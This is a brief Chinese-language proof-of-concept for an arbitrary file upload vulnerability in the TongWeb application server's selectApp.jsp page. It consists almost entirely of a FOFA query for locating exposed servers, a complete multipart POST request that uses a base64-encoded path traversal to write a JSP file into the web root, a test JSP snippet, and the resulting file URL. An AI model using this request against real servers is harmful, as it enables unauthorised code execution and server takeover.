东方通TongWeb-selectApp.jsp存在任意文件上传
fofa
1
| header="TongWeb Server" || banner="Server: TongWeb Server"
|
poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c User-Agent: Mozilla/5.0
Content-Disposition: form-data; name="app_fileName"
Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw
Content-Disposition: form-data; name="app"
Content-Disposition: form-data; name="className"
test
Content-Disposition: form-data; name="uploadApp"; filename="test.jar" Content-Type: application/java-archive
<% out.println(16156223+223415616); %>
|
文件上传路径:http://ip/heimdall/123qwe1.jsp